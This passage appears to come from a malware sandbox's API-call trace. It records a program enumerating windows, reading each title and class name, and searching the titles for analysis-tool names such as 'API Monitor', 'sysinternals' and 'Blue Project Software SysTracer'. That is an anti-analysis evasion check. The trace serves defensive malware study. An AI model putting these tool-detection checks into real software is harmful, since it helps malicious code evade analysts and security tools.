out: param_1="0") returned 1 [0158.762] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.762] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.762] strstr (_Str="Say Convenience", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.762] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.762] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.762] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.762] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.762] strstr (_Str="Say Convenience", _SubStr="sysinternals") returned 0x0 [0158.763] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.763] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.763] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.763] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.763] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65936") returned 5 [0158.763] lstrcpyA (in: lpString1=0x430400, lpString2="65936" | out: lpString1="65936") returned="65936" [0158.763] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.763] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.763] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.763] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.763] GetWindowTextA (in: hWnd=0x10190, lpString=0x340df8, nMaxCount=1024 | out: lpString="Puzzle Fcc Tuesday") returned 18 [0158.763] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.763] lstrcpynA (in: lpString1=0x3401e0, lpString2="Puzzle Fcc Tuesday", iMaxLength=1024 | out: lpString1="Puzzle Fcc Tuesday") returned="Puzzle Fcc Tuesday" [0158.763] lstrcpyA (in: lpString1=0x430800, lpString2="Puzzle Fcc Tuesday" | out: lpString1="Puzzle Fcc Tuesday") returned="Puzzle Fcc Tuesday" [0158.763] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65936") returned 5 [0158.764] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.764] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.764] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.764] GetClassNameA (in: hWnd=0x10190, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="puzzle_fcc_Tuesday_cls") returned 22 [0158.764] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.764] lstrcpynA (in: lpString1=0x341200, lpString2="puzzle_fcc_Tuesday_cls", iMaxLength=1024 | out: lpString1="puzzle_fcc_Tuesday_cls") returned="puzzle_fcc_Tuesday_cls" [0158.764] lstrcpyA (in: lpString1=0x430c00, lpString2="puzzle_fcc_Tuesday_cls" | out: lpString1="puzzle_fcc_Tuesday_cls") returned="puzzle_fcc_Tuesday_cls" [0158.764] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65936") returned 5 [0158.764] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.764] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.764] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.764] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="- main thread") returned 0x0 [0158.764] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.764] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.764] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.765] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="API Monitor") returned 0x0 [0158.765] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.765] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.765] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.765] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.765] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.765] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.765] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.765] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.765] strstr (_Str="Puzzle Fcc Tuesday", _SubStr="sysinternals") returned 0x0 [0158.766] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.766] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.766] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.766] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.766] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65932") returned 5 [0158.766] lstrcpyA (in: lpString1=0x430400, lpString2="65932" | out: lpString1="65932") returned="65932" [0158.766] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.766] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.766] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.766] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.766] GetWindowTextA (in: hWnd=0x1018c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Objectives Bailey Audit") returned 23 [0158.766] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.766] lstrcpynA (in: lpString1=0x340df8, lpString2="Objectives Bailey Audit", iMaxLength=1024 | out: lpString1="Objectives Bailey Audit") returned="Objectives Bailey Audit" [0158.766] lstrcpyA (in: lpString1=0x430800, lpString2="Objectives Bailey Audit" | out: lpString1="Objectives Bailey Audit") returned="Objectives Bailey Audit" [0158.767] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.767] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.767] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.767] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="objectivesbaileyaudit") returned 21 [0158.767] lstrcpyA (in: lpString1=0x430c00, lpString2="objectivesbaileyaudit" | out: lpString1="objectivesbaileyaudit") returned="objectivesbaileyaudit" [0158.767] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.767] strstr (_Str="Objectives Bailey Audit", _SubStr="- main thread") returned 0x0 [0158.767] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.767] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.767] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.767] strstr (_Str="Objectives Bailey Audit", _SubStr="API Monitor") returned 0x0 [0158.768] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.768] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.768] strstr (_Str="Objectives Bailey Audit", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.768] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.768] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.768] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.768] strstr (_Str="Objectives Bailey Audit", _SubStr="sysinternals") returned 0x0 [0158.768] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.768] lstrcpyA (in: lpString1=0x430400, lpString2="65928" | out: lpString1="65928") returned="65928" [0158.768] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.769] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.769] GetWindowTextA (in: hWnd=0x10188, lpString=0x340df8, nMaxCount=1024 | out: lpString="Rich Zealand") returned 12 [0158.769] lstrcpyA (in: lpString1=0x430800, lpString2="Rich Zealand" | out: lpString1="Rich Zealand") returned="Rich Zealand" [0158.769] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.769] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.769] GetClassNameA (in: hWnd=0x10188, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="rich_zealand_wnd") returned 16 [0158.769] lstrcpyA (in: lpString1=0x430c00, lpString2="rich_zealand_wnd" | out: lpString1="rich_zealand_wnd") returned="rich_zealand_wnd" [0158.769] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.769] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.769] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.770] strstr (_Str="Rich Zealand", _SubStr="- main thread") returned 0x0 [0158.770] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.770] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.770] strstr (_Str="Rich Zealand", _SubStr="API Monitor") returned 0x0 [0158.770] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.770] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.770] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.770] strstr (_Str="Rich Zealand", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.770] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.771] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.771] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.771] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.771] strstr (_Str="Rich Zealand", _SubStr="sysinternals") returned 0x0 [0158.771] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.771] lstrcpyA (in: lpString1=0x430400, lpString2="65924" | out: lpString1="65924") returned="65924" [0158.771] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.771] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.771] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.771] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.771] GetWindowTextA (in: hWnd=0x10184, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Volume") returned 6 [0158.771] lstrcpyA (in: lpString1=0x430800, lpString2="Volume" | out: lpString1="Volume") returned="Volume" [0158.771] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.772] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.772] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.772] GetClassNameA (in: hWnd=0x10184, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Volumewnd") returned 9 [0158.772] lstrcpyA (in: lpString1=0x430c00, lpString2="Volumewnd" | out: lpString1="Volumewnd") returned="Volumewnd" [0158.772] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.772] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.772] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.772] strstr (_Str="Volume", _SubStr="- main thread") returned 0x0 [0158.772] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.772] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.772] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.773] strstr (_Str="Volume", _SubStr="API Monitor") returned 0x0 [0158.773] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.773] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.773] strstr (_Str="Volume", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.773] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.773] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.773] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.773] strstr (_Str="Volume", _SubStr="sysinternals") returned 0x0 [0158.773] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.774] lstrcpyA (in: lpString1=0x430400, lpString2="65920" | out: lpString1="65920") returned="65920" [0158.774] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.774] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.774] GetWindowTextA (in: hWnd=0x10180, lpString=0x340df8, nMaxCount=1024 | out: lpString="C Weird Baskets") returned 15 [0158.774] lstrcpyA (in: lpString1=0x430800, lpString2="C Weird Baskets" | out: lpString1="C Weird Baskets") returned="C Weird Baskets" [0158.774] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.774] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.774] GetClassNameA (in: hWnd=0x10180, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="CweirdBaskets") returned 13 [0158.774] lstrcpyA (in: lpString1=0x430c00, lpString2="CweirdBaskets" | out: lpString1="CweirdBaskets") returned="CweirdBaskets" [0158.775] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.775] strstr (_Str="C Weird Baskets", _SubStr="- main thread") returned 0x0 [0158.775] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.775] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.775] strstr (_Str="C Weird Baskets", _SubStr="API Monitor") returned 0x0 [0158.775] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.775] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.775] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.775] strstr (_Str="C Weird Baskets", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.775] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.776] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.776] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.776] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.776] strstr (_Str="C Weird Baskets", _SubStr="sysinternals") returned 0x0 [0158.776] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.776] lstrcpyA (in: lpString1=0x430400, lpString2="65916" | out: lpString1="65916") returned="65916" [0158.776] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.776] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.776] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.776] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.776] GetWindowTextA (in: hWnd=0x1017c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Laptop Tattoo") returned 13 [0158.776] lstrcpyA (in: lpString1=0x430800, lpString2="Laptop Tattoo" | out: lpString1="Laptop Tattoo") returned="Laptop Tattoo" [0158.777] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.777] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.777] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.777] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="laptopTattooapp") returned 15 [0158.777] lstrcpyA (in: lpString1=0x430c00, lpString2="laptopTattooapp" | out: lpString1="laptopTattooapp") returned="laptopTattooapp" [0158.777] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.777] strstr (_Str="Laptop Tattoo", _SubStr="- main thread") returned 0x0 [0158.777] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.777] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.777] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.777] strstr (_Str="Laptop Tattoo", _SubStr="API Monitor") returned 0x0 [0158.777] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.778] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.778] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.781] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.782] strstr (_Str="Laptop Tattoo", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.783] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.792] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.792] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.792] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.792] strstr (_Str="Laptop Tattoo", _SubStr="sysinternals") returned 0x0 [0158.792] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.792] lstrcpyA (in: lpString1=0x430400, lpString2="65912" | out: lpString1="65912") returned="65912" [0158.792] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.792] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.793] GetWindowTextA (in: hWnd=0x10178, lpString=0x340df8, nMaxCount=1024 | out: lpString="English Performing") returned 18 [0158.793] lstrcpyA (in: lpString1=0x430800, lpString2="English Performing" | out: lpString1="English Performing") returned="English Performing" [0158.793] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.793] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.793] GetClassNameA (in: hWnd=0x10178, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="englishperformingapp") returned 20 [0158.793] lstrcpyA (in: lpString1=0x430c00, lpString2="englishperformingapp" | out: lpString1="englishperformingapp") returned="englishperformingapp" [0158.793] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.793] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.793] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.793] strstr (_Str="English Performing", _SubStr="- main thread") returned 0x0 [0158.793] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.794] strstr (_Str="English Performing", _SubStr="API Monitor") returned 0x0 [0158.794] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.794] strstr (_Str="English Performing", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.794] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.794] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.794] strstr (_Str="English Performing", _SubStr="sysinternals") returned 0x0 [0158.794] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.794] lstrcpyA (in: lpString1=0x430400, lpString2="65908" | out: lpString1="65908") returned="65908" [0158.794] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.795] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.795] GetWindowTextA (in: hWnd=0x10174, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Previous Automation Previously") returned 30 [0158.795] lstrcpyA (in: lpString1=0x430800, lpString2="Previous Automation Previously" | out: lpString1="Previous Automation Previously") returned="Previous Automation Previously" [0158.795] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.795] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.795] GetClassNameA (in: hWnd=0x10174, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="PreviousAutomationPreviouslyapp") returned 31 [0158.795] lstrcpyA (in: lpString1=0x430c00, lpString2="PreviousAutomationPreviouslyapp" | out: lpString1="PreviousAutomationPreviouslyapp") returned="PreviousAutomationPreviouslyapp" [0158.795] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.795] 